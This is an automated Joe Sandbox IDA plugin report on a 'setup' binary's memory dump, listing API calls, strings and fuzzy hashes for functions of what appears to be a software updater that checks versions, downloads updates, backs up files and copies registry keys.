• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Value$Close$CreateH_prolog3
• String ID: ForceIEUserAgent$ForceXPEdition$GetUnstableBeta$Software\%s\MultiUpdate
• API String ID: 3883410401-2948741853
APIs
  • Part of subcall function 00C909AD: CreateFileW.KERNEL32(?,00000000,?,00C90D9D,?,?,00000000,?,00C90D9D,?,0000000C), ref: 00C909CA
• GetLastError.KERNEL32 ref: 00C90E08
• __dosmaperr.LIBCMT ref: 00C90E0F
• GetFileType.KERNEL32(00000000), ref: 00C90E1B
• GetLastError.KERNEL32 ref: 00C90E25
• __dosmaperr.LIBCMT ref: 00C90E2E
• CloseHandle.KERNEL32(00000000), ref: 00C90E4E
• CloseHandle.KERNEL32(00C8C05E), ref: 00C90F9B
• GetLastError.KERNEL32 ref: 00C90FCD
• __dosmaperr.LIBCMT ref: 00C90FD4
Strings
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C1C317
  • Part of subcall function 00C32D56: __EH_prolog3_catch.LIBCMT ref: 00C32D5D
• SetTimer.USER32(?,00000064,0000015E,00000000), ref: 00C1C453
  • Part of subcall function 00C1C53F: __EH_prolog3_GS.LIBCMT ref: 00C1C546
  • Part of subcall function 00C1C53F: WaitForSingleObject.KERNEL32(?,000000FF,00000074,00C1C348), ref: 00C1C582
  • Part of subcall function 00C1C53F: Sleep.KERNEL32(000003E8,00000074,00C1C348), ref: 00C1C58D
Strings
• Downloading : %s, xrefs: 00C1C4DB
• Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727), xrefs: 00C1C49F
• Checking if newer version exists., xrefs: 00C1C4B8
• Socket Error!, xrefs: 00C1C511
• Current installed version is %d.%d.%d.%d, xrefs: 00C1C421
• Failed! Socket Error!!, xrefs: 00C1C4F6
• Update from file : %s, xrefs: 00C1C38C
Similarity
• API ID: H_prolog3_$H_prolog3_catchObjectSingleSleepTimerWait
• String ID: Checking if newer version exists.$Current installed version is %d.%d.%d.%d$Downloading : %s$Failed! Socket Error!!$Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727)$Socket Error!$Update from file : %s
• API String ID: 2647486242-2409613667
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C199BE
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C199FE
• PathRemoveFileSpecW.SHLWAPI(?), ref: 00C19B66
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 00C19B92
• CloseHandle.KERNEL32(?), ref: 00C19BA4
• CloseHandle.KERNEL32(?), ref: 00C19BAC
Strings
Similarity
• API ID: CloseFileHandle$CreateH_prolog3_ModuleNamePathProcessRemoveSpec
• String ID: /a /s /m$ /f$ /forcebeta$/c:
• API String ID: 2693857281-1701591951
APIs
• CoInitialize.OLE32(00000000), ref: 00C3F6AB
Strings
Similarity
• API ID: Initialize
• String ID: D2D1.dll$D2D1CreateFactory$D2D1MakeRotateMatrix$DWrite.dll$DWriteCreateFactory
• API String ID: 2538663250-1403614551
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,08000000,00000000), ref: 00C060E3
• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,08000000,00000000), ref: 00C06115
• CloseHandle.KERNEL32(00000000), ref: 00C06125
  • Part of subcall function 00C06008: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,08000000,00000000,?,?), ref: 00C0604C
  • Part of subcall function 00C06008: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00C06066
  • Part of subcall function 00C06008: CloseHandle.KERNEL32(00000000), ref: 00C06073
• SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 00C0614A
• GetLastError.KERNEL32 ref: 00C06155
• CloseHandle.KERNEL32(00000000), ref: 00C06166
• CloseHandle.KERNEL32(?), ref: 00C0616C
• ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00C061C1
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 00C061E2
• CloseHandle.KERNEL32(00000000), ref: 00C0620C
• CloseHandle.KERNEL32(?), ref: 00C06212
Similarity
• API ID: File$CloseHandle$Create$Write$ErrorLastPointerRead
• String ID:
• API String ID: 541900661-0
APIs
• ClientToScreen.USER32(?,?), ref: 00C22375
• GetFocus.USER32 ref: 00C223D0
• GetCapture.USER32 ref: 00C223E4
• SetCapture.USER32(?,00000000), ref: 00C223F7
• GetWindowRect.USER32(?,00000000), ref: 00C2241B
• PtInRect.USER32(?,?,?), ref: 00C2242C
• ReleaseCapture.USER32 ref: 00C22436
  • Part of subcall function 00C22A59: GetWindowRect.USER32(?,?), ref: 00C22A7A
  • Part of subcall function 00C22A59: PtInRect.USER32(?,?,?), ref: 00C22A9B
• GetClientRect.USER32(?,?), ref: 00C2244F
  • Part of subcall function 00C2D3DA: ClientToScreen.USER32(?,?), ref: 00C2D3E9
  • Part of subcall function 00C2D3DA: ClientToScreen.USER32(?,?), ref: 00C2D3F6
• PtInRect.USER32(?,?,?), ref: 00C2246C
• LoadCursorW.USER32(00000000,00007F00), ref: 00C22483
• SetCursor.USER32(00000000), ref: 00C2248A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$Client$CaptureScreen$CursorWindow$FocusLoadRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3513268282-0
                                                                                                                          • Opcode ID: 26dd764a8d1d8b2d2236143dad9da004d1eda212bb4c806376f33c6df9dbc9a8
                                                                                                                          • Instruction ID: 78b5b3b88e5ecc1674e04d2e7bdce25b7e8afc75ab7c0bab5ccb68b3ab48978f
                                                                                                                          • Opcode Fuzzy Hash: 26dd764a8d1d8b2d2236143dad9da004d1eda212bb4c806376f33c6df9dbc9a8
                                                                                                                          • Instruction Fuzzy Hash: 17319032504315BBCB21FFB0AC49FAE77A9FF08300F01451AF966864A1DB35EA40EB56
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C276DC
                                                                                                                          • GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C276EC
                                                                                                                          • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C27700
                                                                                                                          • GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C2770D
                                                                                                                          • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C2778A
                                                                                                                          • SetLastError.KERNEL32(00000057), ref: 00C2779F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$CreateFile$CloseHandleMapping
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1663754159-0
                                                                                                                          • Opcode ID: 15db305eca9f1c0241abeb5a86dd20f84aba3b1240b98e303a15f770119b1bb6
                                                                                                                          • Instruction ID: 210b9967d1750ae1c4175df7cd3e475ccc10e46eeaaf4ca2047912025520a41b
                                                                                                                          • Opcode Fuzzy Hash: 15db305eca9f1c0241abeb5a86dd20f84aba3b1240b98e303a15f770119b1bb6
                                                                                                                          • Instruction Fuzzy Hash: F6218275605721FBDB225B76BCCCB9F7EA8EB49BA1F100225F516E65D0E7708900CBA0
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C43642
                                                                                                                          • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00C4381A
                                                                                                                          • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00C439E2
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00C43A08
                                                                                                                          • UpdateWindow.USER32(?), ref: 00C43A2A
                                                                                                                          • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00C43AE7
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00C43B0D
                                                                                                                          • UpdateWindow.USER32(?), ref: 00C43B2F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$InvalidateRectUpdateWindow$H_prolog3_
                                                                                                                          • String ID: :/\
                                                                                                                          • API String ID: 2009545923-2793184486
                                                                                                                          • Opcode ID: 41c2424e7c126380332c3d0eb5d182b347cf1a0584990cb120ccd09e87d741d5
                                                                                                                          • Instruction ID: afd2a2af1f6a1e534e13f940ae6919e989e66615380f93d557136d93790694de
                                                                                                                          • Opcode Fuzzy Hash: 41c2424e7c126380332c3d0eb5d182b347cf1a0584990cb120ccd09e87d741d5
                                                                                                                          • Instruction Fuzzy Hash: 12F13830600659DFCB14EB60CD99BACBBB5FF88300F154199E546AB2E2DB74AE49DF10
                                                                                                                          Strings
                                                                                                                          • xmlAddElementDecl: content == NULL for ELEMENT, xrefs: 00C60CDE
                                                                                                                          • xmlAddElementDecl: content != NULL for EMPTY, xrefs: 00C60C78
                                                                                                                          • malloc failed, xrefs: 00C60DE8, 00C60E43
                                                                                                                          • Internal: ELEMENT decl corrupted invalid type, xrefs: 00C60F47
                                                                                                                          • xmlAddElementDecl: content == NULL for MIXED, xrefs: 00C60CBC
                                                                                                                          • xmlAddElementDecl: content != NULL for ANY, xrefs: 00C60C9A
                                                                                                                          • xmlAddElementDecl: Table creation failed!, xrefs: 00C60D3B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Internal: ELEMENT decl corrupted invalid type$malloc failed$xmlAddElementDecl: Table creation failed!$xmlAddElementDecl: content != NULL for ANY$xmlAddElementDecl: content != NULL for EMPTY$xmlAddElementDecl: content == NULL for ELEMENT$xmlAddElementDecl: content == NULL for MIXED
                                                                                                                          • API String ID: 0-3980578837
                                                                                                                          • Opcode ID: bc4a0a39bf005dca0e7d5f83b1f086ce3ce4ac52e96e647beab76321d431ad58
                                                                                                                          • Instruction ID: 8a8b23a696e4f3a81d459edd2492914eeceab70b76c5ecc10c0c4cfd8f8161a6
                                                                                                                          • Opcode Fuzzy Hash: bc4a0a39bf005dca0e7d5f83b1f086ce3ce4ac52e96e647beab76321d431ad58
                                                                                                                          • Instruction Fuzzy Hash: 93A10471A00204ABDB309F68EC85B9B77A0EF04311F244679FC1CE7252E772DA65CB92
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C2BFB7: FindClose.KERNEL32(?,?,?,?,00C2BFB0,?,?,?,00000000,00000000,?,?,00C23EAD,?,*.*,00004014), ref: 00C2BFCB
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00C1DFC9
                                                                                                                            • Part of subcall function 00C1C288: UpdateWindow.USER32(?), ref: 00C1C2FA
                                                                                                                          Strings
                                                                                                                          • *.*, xrefs: 00C1DDD3
                                                                                                                          • Failed to copy due to sharing violation. will use special trick to copy file., xrefs: 00C1E10D
                                                                                                                          • Removing source file "%s", xrefs: 00C1DFEC
                                                                                                                          • Remove source directory : "%s"., xrefs: 00C1E03B
                                                                                                                          • Copy file "%s" -> "%s", xrefs: 00C1DF46
                                                                                                                          • Copy file failed! Error: %d, xrefs: 00C1E127
                                                                                                                          • , xrefs: 00C1E0C8
                                                                                                                          • Failed to copy file (Error : %d)"%s", xrefs: 00C1E0B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDeleteFileFindUpdateWindow
                                                                                                                          • String ID: $*.*$Copy file "%s" -> "%s"$Copy file failed! Error: %d$Failed to copy due to sharing violation. will use special trick to copy file.$Failed to copy file (Error : %d)"%s"$Remove source directory : "%s".$Removing source file "%s"
                                                                                                                          • API String ID: 1245518220-2100460131
                                                                                                                          • Opcode ID: e47c900b503fce4602cb5c59f2694a95f6fde97dc1f911d23dbd33cfa82bb977
                                                                                                                          • Instruction ID: df2982793fef6295b9eda1cab2415fb6218bc0a7fe5bb42e0a291f1b721214ed
                                                                                                                          • Opcode Fuzzy Hash: e47c900b503fce4602cb5c59f2694a95f6fde97dc1f911d23dbd33cfa82bb977
                                                                                                                          • Instruction Fuzzy Hash: 02A18171910129EADB20DB60CC99BEEB3B9EF15310F0001E9E80EA6191DB355FC5DF61
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C17AC0
                                                                                                                          • _strlen.LIBCMT ref: 00C17AF8
                                                                                                                          • _strlen.LIBCMT ref: 00C17B3F
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020006,?,00000000,00000000,00000044,00C1729C,?), ref: 00C17BB8
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C17BCC
                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00C17BEC
                                                                                                                          • SHCopyKeyW.SHLWAPI(?,00000000,?,00000000), ref: 00C17BFE
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C17C10
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close_strlen$CopyCreateH_prolog3_Open
                                                                                                                          • String ID: Failed to copy registry value. Invalid parameters
                                                                                                                          • API String ID: 984027009-20749844
                                                                                                                          • Opcode ID: f66b8682a74800d4a1385248cd968e759888c04d9d87992a764bd3a9a09045f2
                                                                                                                          • Instruction ID: 233245310ea2d9d2d8ae1f3fe69fb7066bc22ef4e0ba94d1fdee4cf42fb5f98c
                                                                                                                          • Opcode Fuzzy Hash: f66b8682a74800d4a1385248cd968e759888c04d9d87992a764bd3a9a09045f2
                                                                                                                          • Instruction Fuzzy Hash: 12518E71A08218EBCB21DF95CC99EDE7B79EF06340F104225F415A70A1DB709F89EB90
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C17958
                                                                                                                          • _strlen.LIBCMT ref: 00C17975
                                                                                                                          • GetFileAttributesW.KERNEL32(?,00000000,00000024,00C170C4,?), ref: 00C179B9
                                                                                                                          • GetFileAttributesW.KERNEL32(?,.bak,00000000,?,00000000), ref: 00C17A33
                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00C17A6B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$H_prolog3_Move_strlen
                                                                                                                          • String ID: %s.bak_(%d)$.bak$Backuping file : "%s" -> "%s"$Failed to backup file : %s
                                                                                                                          • API String ID: 70799187-103640923
                                                                                                                          • Opcode ID: de3ba8ac185c63adec974e53d8c02673d4482dcb7925c884a544d56b0dc54668
                                                                                                                          • Instruction ID: 33a3a7ad91ae14fb9d74f3501e01b86e1459a822bf5a73e8d50a049674d6090b
                                                                                                                          • Opcode Fuzzy Hash: de3ba8ac185c63adec974e53d8c02673d4482dcb7925c884a544d56b0dc54668
                                                                                                                          • Instruction Fuzzy Hash: 57416D72904118AECB10EBA4CC469EEBBB8EF16324F144529F451B7091DB309F89EBA1
                                                                                                                          APIs
                                                                                                                          • IsWindow.USER32(?), ref: 00C22886
                                                                                                                          • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 00C228B7
                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C228C0
                                                                                                                          • SendMessageW.USER32(?,00000030,?,00000001), ref: 00C228DE
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00C228FB
                                                                                                                          • OffsetRect.USER32(?,?,?), ref: 00C2290B
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C22939
                                                                                                                          • SendMessageW.USER32(?,00000407,00000000,?), ref: 00C22965
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Rect$Window$ClientOffset
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 3701462380-2679148245
                                                                                                                          • Opcode ID: a46c9fc46a148c6d21cf47cf6e1711048879dec62177955c4d64ead0d599a58e
                                                                                                                          • Instruction ID: 1978ba83cb7bfe9268385c1c9d5a07b71021b99c5e5d94c97fbb68ffd22b4bd0
                                                                                                                          • Opcode Fuzzy Hash: a46c9fc46a148c6d21cf47cf6e1711048879dec62177955c4d64ead0d599a58e
                                                                                                                          • Instruction Fuzzy Hash: 81317E72A00219ABCF11EFA5DC88FEE7BA9EF5C310F110165FA05BB195D671AA40DB60
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00C32F78
                                                                                                                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 00C32F8F
                                                                                                                          • CallWindowProcW.USER32(?,?,00000110,?,?), ref: 00C32FEF
                                                                                                                            • Part of subcall function 00C334A5: GetWindowRect.USER32(0000001C,00000001), ref: 00C334DE
                                                                                                                            • Part of subcall function 00C334A5: GetWindow.USER32(0000001C,00000004), ref: 00C334FB
                                                                                                                          • SetWindowLongW.USER32(?,000000FC,?), ref: 00C33012
                                                                                                                          • RemovePropW.USER32(?,AfxOldWndProc423), ref: 00C3301E
                                                                                                                          • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 00C33029
                                                                                                                          • GlobalDeleteAtom.KERNEL32(?), ref: 00C33033
                                                                                                                            • Part of subcall function 00C33548: GetWindowRect.USER32(0000001C,00000017), ref: 00C33555
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 00C3307B
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catch_LongRemove
                                                                                                                          • String ID: AfxOldWndProc423
                                                                                                                          • API String ID: 3351853316-1060338832
                                                                                                                          • Opcode ID: 5f0aa363773c5e0f508dd14a3179d6f57cf741c5bd1c295d555d58c208c56016
                                                                                                                          • Instruction ID: 781a155ae73d016dc439c5e125cc6c3c854c3333342794b52d4cd9c6bb806a04
                                                                                                                          • Opcode Fuzzy Hash: 5f0aa363773c5e0f508dd14a3179d6f57cf741c5bd1c295d555d58c208c56016
                                                                                                                          • Instruction Fuzzy Hash: EF319A72920258BBDF09AFB8CC59DFF7A79EF49310F14010AF502A6192CB359E01AB60
                                                                                                                           Similarity
                                                                                                                          • Opcode ID: ca9640f79d64b543b0d0168016c4622b40661e53f3d7ba0e62958e058bc7aae7
                                                                                                                          • Instruction ID: 9dae6c70829d5b51f7af7b41e71ca426ba541a7b25aa9a393040a759fe6ba8d1
                                                                                                                          • Opcode Fuzzy Hash: ca9640f79d64b543b0d0168016c4622b40661e53f3d7ba0e62958e058bc7aae7
                                                                                                                          • Instruction Fuzzy Hash: 5602E331A00629DFCB11DF69E894AAEB7B5FF49314B20417DE911AB760C771ED82CB90
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C36E72
                                                                                                                          • PathRemoveFileSpecW.SHLWAPI(?,?), ref: 00C36F63
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00C36FD4
                                                                                                                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00C370D7
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00C37118
                                                                                                                          • _memcpy_s.LIBCMT ref: 00C371A3
                                                                                                                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00C371D6
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00C37243
                                                                                                                          • PathFindFileNameW.SHLWAPI(?,?), ref: 00C3733F
                                                                                                                          • PathFindExtensionW.SHLWAPI(?), ref: 00C3736B
                                                                                                                          Similarity
                                                                                                                          • API ID: Path$File$FreeRemoveSpecTask$Find$ExtensionH_prolog3Name_memcpy_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1705699762-0
                                                                                                                          • Opcode ID: 4cbf24de33baec4212f26033ab35517f46f260e13d7f3a9f297120fcb89e0f28
                                                                                                                          • Instruction ID: 32f15475064693d0b698343f0b53e94ab1abe5d3cebd5caf7fa3115bb85f2a04
                                                                                                                          • Opcode Fuzzy Hash: 4cbf24de33baec4212f26033ab35517f46f260e13d7f3a9f297120fcb89e0f28
                                                                                                                          • Instruction Fuzzy Hash: 95125A71A1011ADFCF14DFA8C898EAEBBB5FF48314F144159E915AB3A1DB30AD05DB60
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00C384B5
                                                                                                                          • FindResourceW.KERNEL32(?,00000000,00000005,00000024,00C1A49A,?,00000000,00000000), ref: 00C384F6
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00C38502
                                                                                                                          • LockResource.KERNEL32(?,00000024,00C1A49A,?,00000000,00000000), ref: 00C38512
                                                                                                                          • GetDesktopWindow.USER32 ref: 00C38549
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00C38554
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00C38560
                                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00C38644
                                                                                                                          • GetActiveWindow.USER32 ref: 00C3864E
                                                                                                                          • SetActiveWindow.USER32(00000000,?,00000024,00C1A49A,?,00000000,00000000), ref: 00C3865A
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindH_prolog3_catchLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 723642982-0
                                                                                                                          • Opcode ID: b2a3b2a890d412e02659ca4c88e7c58b581ad8b858666367187ac190f8445950
                                                                                                                          • Instruction ID: 3b369a973a028fd47400a0b2803139d3980ec39eae05ebdb10896eedc2be23f8
                                                                                                                          • Opcode Fuzzy Hash: b2a3b2a890d412e02659ca4c88e7c58b581ad8b858666367187ac190f8445950
                                                                                                                          • Instruction Fuzzy Hash: 29516970A20716DBDF15AFB0C889BAEBBB5BF08710F040119F911A7292DF749E059BA0

APIs
• __EH_prolog3.LIBCMT ref: 00C211BA
• SHBrowseForFolderW.SHELL32(?), ref: 00C211C7
• SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00C211F7
• GetParent.USER32(000000FF), ref: 00C2124D
• IsWindow.USER32(?), ref: 00C21262
• SendMessageW.USER32(?,0000004E,00000000,?), ref: 00C2128E
• SHGetMalloc.SHELL32(?), ref: 00C212AD
• GetParent.USER32(?), ref: 00C212D5
• IsWindow.USER32(?), ref: 00C212EA
